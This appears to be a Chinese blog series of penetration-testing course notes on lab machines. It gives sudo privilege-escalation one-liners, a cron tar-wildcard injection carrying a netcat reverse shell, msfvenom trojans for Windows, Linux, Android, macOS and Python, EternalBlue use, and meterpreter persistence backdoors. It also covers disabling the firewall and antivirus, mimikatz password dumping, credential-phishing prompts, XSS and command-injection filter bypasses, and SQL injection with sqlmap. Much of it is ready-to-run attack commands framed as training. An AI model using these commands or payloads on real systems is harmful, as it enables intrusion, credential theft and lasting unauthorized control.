在网站目录中创建一个hh.txt（名称也可以在login.php中修改），登录提交的密码就会保存到该txt文件中

1.10 Linux提权和密码破解

Tue, 09 Dec 2025 16:18:30 +0800

第一部分中将会使用到kali攻击机和linux靶机（在资源库的安全靶场类中linsec.ova中下载）

其中，靶机默认用户名：bob，密码：secret（账户权限：普通）

为了方便操作，我们使用攻击机对靶机进行ssh连接：

`1`	`ssh bob@[靶机ip]`

Linux提权

直接提权

sudo su

切换到ash终端

ash（Almquist Shell）是一种轻量级的Unix/Linux命令行解释器，主要用于执行命令和管理文件系统。

`1`	`sudo ash`

使用awk命令

`1`	`sudo awk 'BEGIN {system("/bin/sh")}'`

切换到bash终端

`1`	`sudo bash`

切换到csh终端

`1`	`sudo csh`

curl读取shadow获取加密后的密码（穷举破解）

`1`	`sudo curl file:///etc/shadow`

切换到dash终端（小型设备适用）

`1`	`sudo dash`

ed文本编辑器（一次只能编辑一行）

1
2

sudo ed
!/bin/sh		发现输出内容和命令行类似，可以直接当作终端使用

env查询环境变量同时执行sh（顺手的事）

`1`	`sudo env /bin/sh`

expect自动化脚本

`1`	`sudo expect -c 'spawn /bin/sh;interact'`

find查找同时执行sh（顺手的事*2）

`1`	`sudo find . -exec /bin/sh \; -quit`

ftp协议

1
2

sudo ftp
!/bin/sh

less/more查看（顺手的事*3）

sudo less /etc/passwd		
或	 
sudo more /etc/passwd

!/bin/sh

man文档查看

1
2

sudo man man
!/bin/sh

socat网络工具

`1`	`sudo socat stdin exec:/bin/sh`

ssh连接

`1`	`sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x`

vi文本编辑器

`1`	`sudo vi -c ':!/bin/sh' /dev/null`

切换到zsh终端

`1`	`sudo zsh`

pico

1
2
3

sudo pico
^R^X(Ctrl+R Ctrl+X)
reset; sh 1>&0 2>&0

rvim文本编辑器（适用于有python3的环境）

`1`	`sudo rvim -c ':python3 import os; os.excel("/bin/sh","sh","-c","reset; exec sh")'`

perl

`1`	`sudo perl -e 'exec "/bin/sh";'`

tclsh

1
2

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

git

1
2

sudo git -p help config
!/bin/sh

script

`1`	`sudo script -q /dev/null`

taskset

`1`	`sudo taskset 1 /bin/sh -p`

密码破解

查看/etc/passwd文件

`1`	`cat /etc/passwd`

将用户名后的密文复制到md5在线解密破解,md5解密加密进行破解

例如用户名：hello 密码：nihao（破解后）

使用su hello并输入密码来切换到这个用户权限

tar命令注入

原理：cat /etc/crontab查看自动执行的任务，因此可以将自己的木马程序替换进自动化任务当中

生成木马源代码：

`1`	`msfvenom -p cmd/unix/reverse_netcat lhost=[攻击机ip] lport=[端口号] R`

例如：mkfifo /tmp/qrmq; nc 192.168.80.133 2233 0</tmp/qrmq | /bin/sh >/tmp/qrmq 2>&1; rm /tmp/qrmq

使用echo写入代码到shell.sh并用chmod修改权限

`1`	`echo "木马代码" > shell.sh && chmod +x shell.sh`

接下来创建两个文件：

1
2

echo > "--checkpoint-action=exec=sh shell.sh"
echo > "--checkpoint=1"

这两个文件使得Linux在执行原先的打包备份任务时不会将其视为文件，而是直接借助其高级权限执行木马程序代码

所以根据我们开始时分析的计划任务列表，只要每过一分钟代码就会被执行一次，启动攻击机：

`1`	`nc -lvvp [端口号]`

等上(最多)一分钟就好了~

1.9 msf植入永久后门

Sat, 06 Dec 2025 15:32:40 +0800

meterpreter

本部分使用Kali系统

host注入

在meterpreter中先使用background将当前连接挂起

show options 查看配置方法

set ip [自己的ip] 这里的ip是之后目标指向的ip

set domain [要篡改的域名] 要伪造什么域名

set sessions [目标session] 对哪个session id进行修改

run 运行

用户认证钓鱼

run post/windows/gather/phish_windows_credentials

会在目标桌面弹出管理员认证窗口

passTheHash

必须是system权限

run post/windows/gather/hashdump 获取操作系统的hash值

可以获取管理员(Administrator)密码加密之后的密码，之后使用穷举的方法破解

mimikatz（Windows版）

本部分使用Win10攻击机及Win7靶机

我们使用C:\tools\alltools\密码破解下的mimikatz_trunk.rar软件，将压缩包传入到靶机上并解压，如果不能直接拖动复制（没有安装VM tools）建议使用免费在线文件传输工具 - 零代码快传

解压后文件夹内的双击两个快捷方式可一键执行命令，也可进入Win32或x64文件夹（分别对应32和64位）内打开软件控制台手动输入命令

获取账户密码

其中，在Win32文件夹内有常用命令.txt可供参考:

privilege::debug            当前进程提升为debug权限
inject::process lsass.exe sekurlsa.dll     注入lsass.exe进程
sekurlsa::logonPasswords    列出所有用户密码

system::user                当前用户名
system::computer            当前主机名

process::list                列出所有进程
process::modules             列出当前加载模块


ts::multirdp                 支持多用户远程登录

我们依次执行前三个命令，这时会在wdigest后显示密码

提示：Windows 8 前密码会以明文形式存储在内存中，因此直接获取明文只对Win8之前有效。

扫雷外挂（?）

打开位于tools文件夹下的winmine.exe

在mimikatz窗口中执行命令winmine::infos，即可查看所有雷的位置

mimikatz（Kali版）

本部分继续使用meterpreter控制台

在一个已连接的session中输入load mimikatz（如果失败请用load kiwi）加载mimikatz模块

使用help（失败请用help kiwi）可以查看有哪些功能，例如：

creds_all列出所有凭据

creds_kerberos 拿到Kerberos凭据

creds_msv获取加密后的密码（Win8之后适用）

防火墙和3389端口

本部分继续使用meterpreter控制台

安全措施的处理

在shell中：

netsh advfirewall set allprofiles state off 关闭防火墙

net stop windefend 关闭defener（Windows自带杀软）

bcdedit.exe /set {current} nx AlwaysOff 关闭dep（数据执行保护）

在meterpreter中（不好用）：

run killav 关闭杀软

或run post/windows/manage/killav

开启3389（远程桌面）端口

run post/windows/manage/enable_rdp 打开3389端口

或

run getgui -e （不太靠谱）

run getgui -u 用户名 -p 密码 在目标上创建新的用户账户（不好用）

连接远程桌面

不要在meterpreter中输入，直接在新的终端窗口中输入：

rdesktop -u [用户名] -p [密码] [目标ip] 使用图形界面控制远程桌面

永久后门植入

为什么需要永久后门的植入？

meterpreter是运行在内存里的，重启消失，所以需要植入后门

常见方法：卸载对方的补丁，给对方安装一些有漏洞的软件（比如说ftp程序、输入法……）

这里使用meterpreter自带的功能

方法一（正向连接，不一定成功）

安装服务

background 挂起连接

run metsvc -A 设定一个31337端口上传后门文件

查看服务

jobs 可以看到metsvc_bind_tcp

连接

use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set rhost [目标ip]
set lport 31337
run

方法二（反向连接）

课上教的（不可用，原因未知）

植入启动型后门

在session中：

run persistence -A -S -U -i [多少秒联系一次] -p [端口号] -r [自己的ip] 植入启动型后门

或者

run persistence -X -i [多少秒联系一次] -p [端口号] -r [自己的ip] （成功率更高）

会打开一个新的session，之后目标启动后会自动连接上控制端

实践可用

background	挂起连接
use exploit/windows/local/persistence_service	转到persistence脚本
show options	查看配置方法
set session [编号]
run

1.8 操作系统权限及密码破解

Thu, 04 Dec 2025 22:10:13 +0800

系统权限

Windows

最高：SYSTEM

用户最高:Administrator

others

Linux

最高：root

其他都是普通

CPU权限

OS（操作系统）

ring0（驱动程序）

ring3（大多数其他软件）

目标信息搜集

以下命令均在meterpreter >上执行

系统信息

run post/windows/gather/checkvm

检查目标是否是虚拟机

run post/windows/gather/enum_services

查看目标系统上运行的服务（例如有VM tools必为虚拟机）

run post/windows/gather/enum_applications

查看目标系统上安装的软件

run post/windows/gather/dumplinks

查看目标系统上最近的操作

run post/windows/gather/enum_shares

查看是否开启了共享

run post/windows/gather/enum_patches

查看目标安装了那些补丁

run winenum

查看环境变量

数据嗅探和wireshark的使用

注意： 首先执行load sniffer加载sniffer模块

sniffer_interfaces 查看对方网卡（判断是否启用dhcp:true大概率启用）

sniffer_start [网卡编号] 开始嗅探指定网卡

sniffer_start [网卡编号] 停止嗅探指定网卡

sniffer_dump [网卡编号] [路径及文件名] 将嗅探到的数据保存到指定文件中

例如：sniffer_dump 2 /home/kali/Desktop/123.cap

过滤器的使用

点击打开保存的文件，可以在过滤器中输入ip.src_host==[ip地址]来过滤目标发出的数据包

在过滤器中输入ip.dst_host==[ip地址]来过滤返回的数据包

!(ip.src_host==[ip地址]) 过滤除了某个ip以外的所有数据包

tcp 或udp等只查看某种协议的数据包

组合使用： ip.src_host==[ip地址] && tcp

其余自行摸索

常见网络协议

以下是网络通信中最常见的协议分类整理，包含 协议名称、中文名、核心作用 及关键补充说明，按功能场景分组便于理解：

核心传输层协议（负责端到端数据传输）

协议名称	中文名	核心作用	关键特点
TCP	传输控制协议	提供可靠、面向连接的字节流传输	三次握手建立连接、四次挥手断开、重传机制（保证数据不丢失/不重复），适用于文件传输、网页加载等场景
UDP	用户数据报协议	提供无连接、不可靠的数据包传输	无握手过程、低延迟，适用于视频通话、游戏、直播等对实时性要求高于可靠性的场景

网络层协议（负责路由与寻址）

协议名称	中文名	核心作用	关键特点
IP	网际协议	定义数据包格式，实现跨网络设备的寻址与转发	TCP/UDP 的底层支撑，仅负责“送达”，不保证可靠性（IPv4 是目前主流，IPv6 逐步普及）
ICMP	互联网控制消息协议	用于网络设备间的差错报告与状态查询	常见场景：ping 命令（检测主机可达性）、 traceroute（追踪路由路径）
ARP	地址解析协议	将 IP 地址转换为物理地址（MAC 地址）	局域网内通信必需，解决“知道对方 IP 但不知道硬件地址”的问题
RARP	反向地址解析协议	将 MAC 地址转换为 IP 地址	适用于无 DHCP 服务器的场景（如早期无盘工作站）
IGMP	互联网组管理协议	用于主机加入/退出多播组	支持视频会议、组播直播等“一对多”通信场景

应用层协议（直接面向用户业务）

协议名称	中文名	核心作用	关键特点
DNS	域名系统协议	将域名（如 www.baidu.com）解析为 IP 地址	解决“记 IP 难”的问题，是互联网访问的“地址簿”
HTTP	超文本传输协议	用于 Web 浏览器与服务器之间的网页传输	明文传输（不安全），默认端口 80，支撑普通网页访问
HTTPS	安全超文本传输协议	HTTP + TLS/SSL 加密，实现安全的网页传输	加密数据（防窃听/篡改），默认端口 443，用于支付、登录等敏感场景
FTP	文件传输协议	用于客户端与服务器之间的文件上传/下载	明文传输，默认端口 21（控制）+ 20（数据），适用于非敏感文件传输
SFTP	SSH 文件传输协议	基于 SSH 加密的文件传输协议	加密传输（替代 FTP），默认端口 22，安全性更高
SSH	安全外壳协议	远程登录服务器并执行命令	加密传输（替代 Telnet），默认端口 22，是服务器管理的核心协议
Telnet	远程终端协议	远程登录服务器（明文传输）	无加密（不安全），默认端口 23，仅用于测试或非敏感环境
SMTP	简单邮件传输协议	用于发送电子邮件（服务器到服务器）	默认端口 25（明文）/ 465（SSL 加密），支撑邮件发送功能
POP3	邮局协议版本 3	用于接收电子邮件（客户端到服务器）	下载邮件到本地，默认端口 110（明文）/ 995（SSL 加密）
IMAP4	互联网邮件访问协议版本 4	接收电子邮件（支持邮件同步）	可在多设备同步邮件状态（已读/未读），默认端口 143（明文）/ 993（SSL 加密）
NTP	网络时间协议	实现网络设备间的时间同步	保证服务器、终端等设备时间一致，默认端口 123（UDP）
DHCP	动态主机配置协议	自动为客户端分配 IP 地址、子网掩码等网络参数	无需手动设置 IP，适用于局域网（如家庭、公司网络）
SNMP	简单网络管理协议	监控和管理网络设备（路由器、交换机等）	收集设备状态（如流量、负载），默认端口 161（UDP）
TFTP	简单文件传输协议	轻量级文件传输（无认证）	仅支持简单上传/下载，无权限验证，默认端口 69（UDP），适用于设备固件升级

其他常用协议（特殊功能场景）

协议名称	中文名	核心作用	关键特点
PPPoE	基于以太网的点对点协议	用于宽带拨号上网（如电信、联通家庭宽带）	实现“账号+密码”认证，建立互联网连接
L2TP	第二层隧道协议	与 IPsec 配合实现 VPN 连接	用于远程办公访问公司内网，默认端口 1701
IPSec	IP 安全协议	为 IP 数据包提供加密、认证服务	常用于 VPN 加密（如 L2TP/IPSec、IKEv2），保障跨网传输安全
MQTT	消息队列遥测传输协议	轻量级物联网（IoT）设备通信协议	低带宽、低功耗，适用于传感器、智能家居设备的数据传输

1.7 MSF框架以及使用

Tue, 02 Dec 2025 18:33:10 +0800

本篇课程如未特别解释均使用 Kali 虚拟机进行

MSF的了解

msf（全称 metasploit）是一款功能强大的攻击框架框架

现在我们打开msf

启动 Kali，在终端中输入msfconsole打开msf

msf中集成了很多工具，例如你可以调用nmapnmap -sV [目标ip]

实验部分

msf使用漏洞进行攻击

这里以漏洞：永恒之蓝 ms17_010为例

前置知识： msf如果使用漏洞去攻击对方，需要的条件：

漏洞
攻击载荷（木马、病毒）

STEP1 利用漏洞进入目标计算机

use exploit/windows/smb/ms17_010_eternalblue	选择要使用的漏洞
show options			查看使用要求
set rhosts [目标ip]		
run或者exploit

返回了以下内容说明漏洞已经利用成功: WIN!

STEP2 执行命令

这时发现控制台的指令前缀已经从msf >变成了metepreter >我们可以敲一个help看看有什么指令可用

这边举例几个常用指令：

getuid 查看当前控制的用户账户权限

shell 打开目标的终端

其他命令可以参考这篇文章：Meterpreter 命令手册（中文）

退出连接输入 exit

另外如果想要暂时断开（挂起）连接可以使用：background命令

这时当前连接就会被保存为名称为session 的任务，其中为数字，例如session 1

sessions 查看控制了多少人

过会要重新连接时可以输入sessions -i 1即可

基于木马程序的msf内网渗透

服务端准备

现在我们要用msf生成 32位 木马程序，执行下面的命令：

1
2

cd Desktop/			方便找到exe文件
msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=[控制端ip] lport=[端口号] -f exe > 文件名.exe

现在我们生成的是用于服务端的文件，接下来我们开始配置控制端

补充：生成64位木马命令

`1`	`msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[控制端ip] lport=[端口号] -f exe -o 文件名.exe`

控制端准备

msfconsole 打开msf控制台

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp			payload后的内容要与上面-p后面的内容一致
set lhost [控制端ip]
run或者Sexploit

现在开始如果有目标打开了木马程序就会自动连接到被控端：

其他类型木马

生成Mac木马（32位旧版）

`1`	`msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp lhost=[控制端ip] lport=[端口号] -f macho -p 文件名.macho`

生成安卓木马（旧版，需要数字签名）

`1`	`msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp lhost=[控制端ip] lport=[端口号] -f apk -o 文件名.apk`

生成power shell木马（raw表示生成代码，不是程序）

`1`	`msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp lhost=[控制端ip] lport=[端口号] -e cmd/powershell_base64 -i 3 -f raw -o msf.ps1`

生成Linux木马

`1`	`msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp lhost=[控制端ip] lport=[端口号] -f elf -o 文件名.elf`

生成python木马

`1`	`msfvenom -p python/meterpreter/reverse_tcp lhost=[控制端ip] lport=[端口号] -f raw -o 文件名.py`

meterpreter操作补充

提权

方法一：直接提权

getsystem 直接提权（有风险，可能报错）

方法二：通过ask模块提权

若当前已经进入meterpreter > 控制台：

1
2
3

background		挂起连接
use exploit/windows/local/ask		加载ask模块
info		查看信息

查看到需要指定目标的session号码，所以使用sessions查询（以session 1为例）

1
2
3

set session 1
set filename QQ.exe   此处填伪装的文件名，以qq为例
run

方法三：UAC绕过提权（成功率不高，仅限32位系统）

use exploit/windows/local/bypassuac
show options
set session [编号]
run

之后会反弹一个新的session，进入这个新的session

1.6 其他基础web漏洞介绍

Sun, 30 Nov 2025 14:10:19 +0800

本篇文章如未特别强调，均使用提供的Win10进行实验

靶场的获取与配置

本篇内容基于dvwa靶场，文件已经放在文章0.安全类工具文件资源库中了，这里再贴出来一次

链接：https://pan.baidu.com/s/1dmU9DcXAthjY0te4qv4tAg 提取码：38mj

下载得到dvwa汉化版.zip，将压缩包里dvwa文件夹里的文件解压到C:\phpstudy_pro\WWW中，注意提前将phpmyadmin以外的其他文件删除

打开phpstudy，在“网站”菜单中的“管理”处设置php版本为5.6.x;
到“设置”-“配置文件”中点击你上面选择的php版本打开配置文件
使用Ctrl+F搜索allow_url_fopen和allow_url_include确保这两项后面的配置都是On，保存文件
回到首页，启动Apache和MySQL，打开FireFox浏览器访问127.0.0.1，点击下面的 |创建/重置数据库| 按钮
登录，用户名为：admin，密码为：password
在DVWA安全页面里设置安全等级为low

靶场的使用

提前配置好抓包环境并打开burp suite，详见1.1 抓包和web基本知识

小贴士：可以在phpstudy目录下新建test.php用来测试代码中看不懂的部分

暴力破解 Brute Force

打开dvwa中暴力破解页面，可以点击右下角查看源代码简单分析功能如何实现

现在随便输入用户名和密码（以分别为admin；123为例），同时启用抓包，点击“登陆”，发现已经抓到相应数据包，右键空白处点击“Send to Intruder"后放行数据包
转到Intruder-Positions页面，这里需要我们设置要暴力破解哪个部分，我们先点击Clear§，然后选中密码部分（也就是123），点击add§,Attack Type选择sniper
转到Payloads选项中，可以在Payloads Options中添加可能的密码或直接导入字典
点击Start attack等待攻击完成提示Finished
点击Length按照长度排序，发现“password”的长度明显与其他不同，说明password是正确密码

补充1(点击展开)：

不同的攻击模式：

sniper 模式[单向爆破] 知道用户名不知道密码的情况，破解一些单一的输入框
battering ram 模式[并发攻击] 对多个目标进行单一的payload攻击，也就是用户名和密码一致
pitchfork 模式[交叉攻击(撞库)] 有几个变量就可以选几个字典，从字典中随机抽取穷举
cluster bomb 模式[完整爆破] 从字典中挨个抽取尝试

命令注入 Command injection（命令执行漏洞）

所谓命令执行漏洞就是说一个地方可以执行操作系统的命令

low 低难度

打开dvwa中命令注入页面，可以点击右下角查看源代码简单分析功能如何实现

补充2(点击展开)：

在Windows CMD中可以通过&、&&符号同时输入并执行两条指令，其他也有|、||等在特定条件下可用

例如执行ping www.retr0.xyz & ipconfig，输出

正在 Ping www.retr0.xyz [104.21.69.83] 具有 32 字节的数据:
来自 104.21.69.83 的回复: 字节=32 时间=211ms TTL=128
来自 104.21.69.83 的回复: 字节=32 时间=202ms TTL=128
来自 104.21.69.83 的回复: 字节=32 时间=200ms TTL=128
来自 104.21.69.83 的回复: 字节=32 时间=201ms TTL=128
104.21.69.83 的 Ping 统计信息:
    数据包: 已发送 = 4，已接收 = 4，丢失 = 0 (0% 丢失)，
往返行程的估计时间(以毫秒为单位):
    最短 = 200ms，最长 = 211ms，平均 = 203ms
Windows IP 配置
以太网适配器 Ethernet0:
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::9087:a026:a5bf:e1c5%12
   IPv4 地址 . . . . . . . . . . . . : 192.168.80.134
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.80.2

我们直接填入`127.0.0.1 & ipconfig`即可

high 高难度

现在我们加大难度为high，重新查看源代码发现多出了过滤机制

// Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

补充3(点击展开)：

str_replace的用法：str_replace("要换的字符串","替换为",作用于哪个变量)，例如：

<?php
$a = $_GET['username'];
$b = str_replace('t','x',$a);
echo $b;
?>

打开url:http://127.0.0.1/test.php?username=retr0，返回 rexr0

漏洞解析： 观察发现屏蔽名单中’| ‘为一个管道符加一个空格，因此我们填入127.0.0.1 |ipconfig即可

如果在linux环境下

ping 127.0.0.1 & cat /etc/passwd 几乎同时执行

ping 127.0.0.1 && cat /etc/passwd 执行完左边去执行右面

ping 127.0.0.1 | cat /etc/passwd 只执行右面

反射型跨站点脚本（XSS）

打开dvwa中XSS 反射型页面，随便输入几个字符测试，以retr0为例

low 低难度

右键查看页面源代码发现提交的字符会直接填到下面的“你好”后面，如图：

结合右下角查看php源代码也可以得到

漏洞解析： 因此我们可以在输入的字符串中插入<script></script>的html脚本，让网页执行我们的脚本代码

填入ret<script>alert(123)</script>r0,网页弹窗内容‘123’

medium 中等难度

点击右下角查看源代码发现添加了过滤机制：

`1`	`$name = str_replace( '<script>', '', $_GET[ 'name' ] );`

漏洞解析： 屏蔽代码只过滤了一次<script>，因此我们使用双写绕过，填入ret<sc<script>ript>alert(123)</script>r0，其中<script>被过滤后又重新组合为新的<script>从而生效；此外将<script>中的字符替换为大写也可以，例如ret<sCRIpt>alert(123)</script>r0（原理：前端代码不识别<script>大小写）

high 高难度

点击右下角查看源代码发现升级了过滤机制：

`1`	`$name = preg_replace( '/<(.)s(.)c(.)r(.)i(.)p(.)t/i', '', $_GET[ 'name' ] );`

因此直接使用<script>的方法已经完全不可用

补充4(点击展开)：

html存在以下加载图片的句法：

<img src='x' onerror='alert(123)'/>

当页面试图加载名为x的图片但是失败时就会把onerror后面的代码当作JavaScript来执行

另外还有onmouseover=(鼠标浮过)onmouseup=(鼠标松开)onmousedown=(鼠标按下)等参数可供替换

漏洞解析： 我们利用html图片加载代码来执行js，填入ret<img src='x' onerror='alert(123)'/>r0

存储的跨站点脚本（XSS）

打开dvwa中XSS 存储型页面，随便输入几个字符测试

low 低难度

发现和上面的反射型原理类似，直接填入留言hel<script>alert(123)</script>lo

medium 中等难度

查看源代码发现在留言上启用了htmlspecialchars（将特定的 HTML 字符转换为 HTML 实体字符），名字上添加了过滤，如下：

1
2
3

$message = htmlspecialchars( $message ); 

$name = str_replace( '<script>', '', $name );

因此我们针对名字下手，直接填入双写绕过的字符串发现网页对长度有限制，所以要用burp suite修改数据包

随便填写名字和留言（以123；hello）为例，打开抓包后点击“提交留言”，发现截获的数据包有以下内容（不一定完全一致）：

txtName=123&mtxMessage=hello&btnSign=%E6%8F%90%E4%BA%A4%E7%95%99%E8%A8%80

将这里的123改为hel<sc<script>ript>alert(123)</script>lo后放行数据包发现提交成功

high 高难度

查看源代码发现名字对<script>的屏蔽升级：

`1`	`$name = preg_replace( '/<(.)s(.)c(.)r(.)i(.)p(.)t/i', '', $name );`

漏洞解析： 依旧结合抓包使用图片加载机制传入字符串hel<img src='x' onerror='alert(123)'/>lo，成功提交

跨站请求伪造 (CSRF)

low 低难度

打开dvwa中跨站请求伪造 (CSRF)页面，随便输入几个字符测试

获取当前页面的url：http://127.0.0.1/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=æ´æ¹#

应用场景： 利用上面的连接制作钓鱼网站诱导某网站管理员点击该链接即可直接修改管理员密码

1.5 SQL注入系列-1

Fri, 28 Nov 2025 20:07:03 +0800

手动注入(ORDER BY与联合查询注入)

以靶场http://sqlilabs.njhack.xyz/Less-1/index.php为例

Step1：破坏数据库语句

破坏数据库语句的目的就是让数据库报错，通过报错信息猜测查询语句的写法

数据库传入参数的几种闭合方式：

''
""
()
((''))
("")
((""))
(())
没有闭合方式

补充1：

\称为转义字符，可以把自己后面的第一个东西当作字符串去执行

我们传入以下参数：2\

有如下报错：

我们选取其中核心部分''2\' LIMIT 0,1'去掉头尾（因为头尾用来闭合的符号是php报错语句携带的，不是真实代码）

`1`	`'2\' LIMIT 0,1`

由此得知该数据库的查询语句是单引号''闭合

因此大概估计查询语句可能为

`1`	`select username,password from tablex where id = '$id' limit 0,1`

解释：此处limit a,b语法指从数据表的第a条起选取b条数据

数据表条目要从第0个开始数

补充2：

数据库的注释符：--、/**/、#
+在GET请求里相当于空格

+一般配合--作为GET请求的注释符使用

接下来我们传入参数id=2' --+，那么拼成的语句是：

`1`	`select username,password from tablex where id = '2' --+ 'limit 0,1`

由于--把后面的内容都注释掉了，实际上执行的数据库语句应该是：

`1`	`select username,password from tablex where id = '2'`

提交参数发现查询正常（如图），说明它真的是用''进行闭合的

后日谈： 也可以用永真或永假条件进行测试，即传入

1
2

OR 1=1	//永真
OR 1=2	//永假

Step2：确定查询了多少个栏目

从现在开始我们要调用各种语法查询数据，记住之后的语法全部都是插入在2' {} --+中的花括号位置！

因为之前的语句中username,password栏目是猜测的，所以接下来要核实究竟有多少个栏目

传入参数2' order by [数字] --+使用二分法查看

依次传参，其中数字填为10、5、3……

当数字最大为3时有结果，改为4时没有结果

因此确定查询出了3个栏目，之前的猜测错误

修正：可能的查询项目是id,username,password

Step3：显示报错位

传入参数2' union select 1,2,3 --+返回结果

但是我们想要让查询的1,2,3显示出来，所以要故意让union之前的查询语句出错掩盖掉正常数据

传入参数-2' union select 1,2,3 --+返回结果

说明2、3号位是报错位（显示位）

补充3：

union select a,b,c语法为联合查询，方便我们将两条查询语句捆绑起来一起执行，而且即便其中一条查询语句报错也不影响另一条查询语句输出结果，本地演示效果如下：

第二条select查询的1,2,3正好与前面查询的3个项目一一对应显示，因此第二条select内容务必参照Step2中获得的查询栏目数填写！

Step4：查看数据库的库名

使用语法database()替换任意报错位

传入参数-2' union select 1,database(),3 --+返回结果:

此时2号位对应显示的就是数据库的库名：security

Step5：根据库名查看表名

补充4：

数据库中一般有一个库名为information_schema其中有名为TABLES的数据表，里面统计了各个数据库名及其对应包含的表名，其中数据库名所在的列（栏目）为TABLE_SCHNEMA，数据表名所在的列（栏目）为TABLE_NAME，如图

所以我们要编辑一下第二条查询语句让他能查询到information_schema库中TABLES表中的TABLE_NAME栏目，并且要限制条件TABLE_SCHEMA=‘security’，整合一下需求：

`1`	`-2' union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='security' --+`

为了方便一个个查询符合的数据（一个个查看security库中的表名）我们可以在第二条语句后面补充limit 0,1，之后依次修改前一个数字为1、2、3、4……即可，也就是：

`1`	`-2' union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='security' limit 0,1 --+`

传入参数后发现有4张表：emails referers uagents users

显然users这个表对我们应该更有用

Step6：查询所需表的列（栏目）名

补充5：

information_schema这个库中还有一个名为COLUMNS的表，里面记录了某个数据库（TABLE_SCHEMA）当中每个表（TABLE_NAME）里包含的栏目(COLUMN_NAME)

后日谈：

information_schema（MySQL元数据系统库）

tables 表
(表元数据)

TABLE_SCHEMA
表所属数据库名

TABLE_NAME
表名称

columns 表
(列元数据)

TABLE_SCHEMA
字段所属数据库名

TABLE_NAME
字段所属表名

COLUMN_NAME
字段名

所以我们现在的需求就是去information_schema.COLUMNS表中查找COLUMN_NAME栏目来看看security里users这个表有哪些栏目，并且添加限定条件TABLE_SCHEMA='security' and TABLE_NAME='users'整合需求得到以下参数

`1`	`-2' union select 1,COLUMN_NAME,3 from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' limit 0,1 --+`

依次修改limit的值发现有这三个栏目：id username password

Step7：全部取出username及对应password

补充6：

使用group_concat(栏目名)可以取出对应栏目的所有数据

方法一：group_concat()语法

传入以下参数：

`1`	`-2' union select 1,group_concat(username),group_concat(password) from users --+`

返回结果：

注：此方法在之前需要使用limit语法的地方也可尝试

方法二：limit a,b 语法

适用情况：网站有输出长度限制

与之前相同，在参数后面添加limit 0,1手动修改依次输出

工具辅助注入

sqlmap 用法（使用Kali版本）

慢速通用版：

STEP1:sqlmap -u [目标url] --dbs也可使用sqlmap -u [目标url] --current-db

前者获取目标网站的所有库名，后者获取当前数据库名

STEP2:sqlmap -u [目标url] -D [库名] --tables

获取指定库里的表

STEP3:sqlmap -u [目标url] -D [库名] -T [表名] --columns

获取指定表里的栏目

STEP4:sqlmap -u [目标url] -D [库名] -T [表名] -C xxx,xxx --dump

获取表里指定栏目的数据

完毕

快速版（也需要分步添加参数）：

sqlmap -u [目标url] --dbs --batch --threads 10 --technique U

使用sqlmap查看目标网站的数据库库名，忽略错误，开10线程，使用union select注入目标网站

补充：

–technique X 中后接参数的其他类型

E = 报错注入 error based（无法发现报错位，但是数据库报错会出现）

B = 布尔型注入 booled based（无法发现报错位，数据库闭合破坏也不出现，但是界面上只会出现有和没有东西两种情况）

T = 布尔型时间盲注 time based（无法发现报错位，数据库闭合被破坏也不出现，界面上也没有出现消失东西的情况）

略微引申：POST类型的注入

以靶场http://sqlilabs.njhack.xyz/Less-11/index.php为例

STEP1：随便提交数据，使用burp suite抓包

输入账号：admin1 密码：admin1

抓包得到post内容uname=admin1&passwd=admin1&submit=Submit

STEP2：使用sqlmap注入

sqlmap -u http://sqlilabs.njhack.xyz/Less-11/index.php --data "uname=admin1*&passwd=admin1&submit=Submit" --current-db --batch --threads 10 --technique U

注意：–data后跟着的""包裹字符串内容要在打击处用*做标记

接下来的步骤略

拓展知识

web渗透中目标不同的组合：

Windows+iss+asp/aspx(asp.net)+access/mssql

Windows+apache+php+mysql = wamp （一般使用软件进行集成化搭建）

linux+apache/nginx+php+mysql = lamp/lnmp （又可能使用宝塔或其他面板搭建）

linux+tomcat+java(jsp)+oracle/mysql

linux+nginx+python(django/flask/tornado/fastapi)+go(beego/gin)+mysql

1.4 php基础：用户交互与数据库交互

Wed, 26 Nov 2025 23:11:40 +0800

用户交互

基本结构

核心架构和输出操作

php的基本结构是这样的：

1
2
3

<?php
echo "Hello World!";
?>

此处echo就相当于Python里的print输出

且中间部分每行结尾一定一定要加;（因为真的很容易忘）

变量

此外，再输出内容中如果有多个部分组成请用英文句号.隔开（相当于python中print里的逗号全部换成句号，仅此而已）例如：

<?php
$a = "Hi!";
echo $a."Hello!";
?>

if 判断

Quickstart：

<?php
// 定义一个简单的变量
$age = 18;

// if判断：如果$age大于等于18，执行花括号里的代码
if ($age >= 18) {
    echo "你已经成年啦！";
}

// 再补一个if-else的简单例子
$score = 59;
if ($score >= 60) {
    echo "考试及格啦！";
} else {
    echo "考试不及格，继续加油！";
}
?>

由此可见，它的基本结构是这样的：

if (判断条件) {
  语句块1;
  语句块2;
} else {
  语句块1;
  语句块2;
}

while 循环

Quickstart：

<?php
// 初始化计数器
$i = 1;

// while循环：只要$i小于等于5，就执行循环体
while ($i <= 5) {
    echo "当前数字是：{$i}<br/>";
    // 计数器自增（必须写，否则会无限循环！）
    $i++;
}
?>

由此可见，它的基本结构应该是这样的：

while (循环判断条件) {
  语句块1;
  语句块2;
}

变量格式

php中的变量没有数据类型，一律在变量名前面加上$，例如

<?php
$a = "Hi!";
echo $a;
?>

GET 命令

